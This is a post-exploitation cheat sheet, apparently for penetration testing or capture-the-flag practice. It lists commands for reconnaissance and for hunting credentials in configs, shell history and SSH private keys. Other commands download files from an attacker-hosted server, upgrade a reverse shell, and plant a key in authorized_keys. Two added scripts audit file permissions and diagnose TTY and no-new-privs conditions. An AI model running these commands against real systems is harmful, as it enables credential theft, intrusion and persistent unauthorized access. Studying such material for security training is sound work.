Situational Awareness

Get your bearings immediately after landing a shell: know what you’re on, who you are, and what network you can reach before doing anything else.
whoami; id
hostname; uname -a
ip a; ip route
cat /etc/hosts
ps aux
env

Credential Hunting

Config files, shell history, and SSH keys are the highest-yield targets: grep broadly and follow the trail.
find / -name "*.conf" 2>/dev/null | xargs grep -l "password" 2>/dev/null
cat ~/.bash_history
cat ~/.ssh/id_rsa
find / -name "id_rsa" 2>/dev/null
grep -r "password" /var/www/html/ 2>/dev/null
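The same three locations that make credential hunting productive are the ones an administrator should be auditing. The script below is an added example, not part of the original page: it walks a directory for SSH private keys, shell history files and config files that mention "password", and reports any that are readable by group or others. The sample home directory it builds is constructed for the demo; the file names and the `audit_secret_perms` function are this example's own.

```shell
#!/bin/sh
# Added example, not from the original page: audit the high-yield credential
# locations (config files mentioning "password", shell history, SSH private
# keys) for loose permissions so they can be locked down. Sample files below
# are constructed for the demo.

# audit_secret_perms DIR: print each matching file under DIR whose mode grants
# read access to group or others.
audit_secret_perms() {
    find "$1" -type f \( -name 'id_*' -o -name '.*_history' -o -name '*.conf' \) 2>/dev/null |
    while IFS= read -r f; do
        case "$f" in
            # only config files that actually hold a credential are interesting
            *.conf) grep -qi 'password' "$f" 2>/dev/null || continue ;;
        esac
        # columns 5-10 of "ls -l" are the group and other permission bits (e.g. "r--r--")
        case "$(ls -ld "$f" | cut -c5-10)" in
            *r*) printf '%s\n' "$f" ;;
        esac
    done
}

# Build a throwaway home directory with a mix of safe and unsafe files (constructed).
demo_dir=$(mktemp -d)
mkdir -p "$demo_dir/.ssh"
printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' 'constructed' > "$demo_dir/.ssh/id_rsa"
chmod 644 "$demo_dir/.ssh/id_rsa"            # world-readable key: flagged
printf '%s\n' 'db_password = constructed' > "$demo_dir/app.conf"
chmod 640 "$demo_dir/app.conf"               # group-readable credential: flagged
printf '%s\n' 'listen 80' > "$demo_dir/nginx.conf"
chmod 644 "$demo_dir/nginx.conf"             # no credential inside: not flagged
printf '%s\n' 'ls -la' > "$demo_dir/.bash_history"
chmod 600 "$demo_dir/.bash_history"          # owner-only: not flagged

audit_secret_perms "$demo_dir"
rm -rf "$demo_dir"
```

Run it against a real home directory (or `/etc`) to get a list of files whose mode, not just their contents, makes them findable by any local user; the fix is `chmod 600` on the reported paths and, for config files, moving the secret out of a file the web server's account can read.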

File Transfer

Stand up a quick HTTP server on the attacker machine and pull files down with wget or curl: works in almost every environment.
python3 -m http.server 8080
wget http://<IP>:8080/file
curl http://<IP>:8080/file -o file

Shell Upgrade

Raw netcat shells are fragile: upgrade to a full PTY immediately so you get job control, tab completion, and proper signal handling.
python3 -c 'import pty; pty.spawn("/bin/bash")'
# CTRL+Z
stty raw -echo; fg
export TERM=xterm

SUID Failures in Reverse Shells

Some privesc paths look valid but silently do nothing through a reverse shell. Two mechanisms cause this.

No TTY

A reverse shell is a raw I/O tunnel with no TTY device. SUID binaries, sudo, and PAM-based auth require a proper TTY to grant elevated privileges. Without one, they silently drop the privilege with no error.

PR_SET_NO_NEW_PRIVS

If your shell was spawned through a web server like Apache, it likely inherited this kernel flag:
apache  (PR_SET_NO_NEW_PRIVS=1)
  └── web shell
        └── reverse shell  (inherits no-new-privs)
It’s a one-way flag: once set, every child process inherits it and it cannot be unset. The kernel ignores setuid bits and blocks any execve-based privilege gain for the entire lineage. PATH hijacks and SUID binaries both fail silently.

Fix: inject your public key into the target user’s ~/.ssh/authorized_keys and SSH in. You get a clean TTY with no inherited restrictions, and the same privesc path that failed before will work.
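Both of the conditions above (the missing TTY from the Shell Upgrade section and the inherited no-new-privs flag) can be checked directly rather than inferred from a failed attempt. The script below is an added example, not from the original page: it tests whether stdin is a terminal and parses the `NoNewPrivs` field of `/proc/self/status` (present on Linux since 4.10; on a defended host this flag is what systemd's `NoNewPrivileges=yes` sets on a service, so seeing it on a web-server process is a sign of deliberate hardening). The `has_tty`, `nnp_from_status`, `explain` and `report` functions are this example's own names.

```shell
#!/bin/sh
# Added example, not from the original page: diagnose the two conditions the
# section describes (no TTY, no_new_privs) before concluding a privilege path
# is broken. Reads /proc/self/status (Linux; "NoNewPrivs" field since 4.10).

# has_tty: prints "tty" when stdin is a terminal, "no-tty" otherwise.
has_tty() {
    if [ -t 0 ]; then printf 'tty\n'; else printf 'no-tty\n'; fi
}

# nnp_from_status STATUS_TEXT: extract the NoNewPrivs value (0 or 1) from the
# text of a /proc/<pid>/status file; prints "unknown" when the field is absent
# (older kernel, or no procfs at all).
nnp_from_status() {
    printf '%s\n' "$1" | awk -F'\t' '
        $1 == "NoNewPrivs:" { print $2; found = 1 }
        END { if (!found) print "unknown" }'
}

# explain TTY NNP: one-line reading of the two results together.
explain() {
    case "$1/$2" in
        tty/0)    printf 'TTY present and no_new_privs clear: setuid and sudo can grant privileges\n' ;;
        no-tty/0) printf 'no TTY: TTY-dependent auth (sudo, PAM) will not grant privileges\n' ;;
        */1)      printf 'no_new_privs set: the kernel ignores setuid bits for this whole process tree\n' ;;
        *)        printf 'NoNewPrivs field unavailable: cannot determine\n' ;;
    esac
}

# report: run both checks against the current process.
report() {
    status_text=$(cat /proc/self/status 2>/dev/null)
    t=$(has_tty)
    n=$(nnp_from_status "$status_text")
    printf 'tty=%s no_new_privs=%s\n' "$t" "$n"
    explain "$t" "$n"
}

report
```

Because the flag is inherited and cannot be cleared, `report` gives the same answer for every descendant of the process you run it in; a `1` here means the whole lineage is affected, which is exactly why the page's fix is a fresh SSH session rather than another child of the current shell.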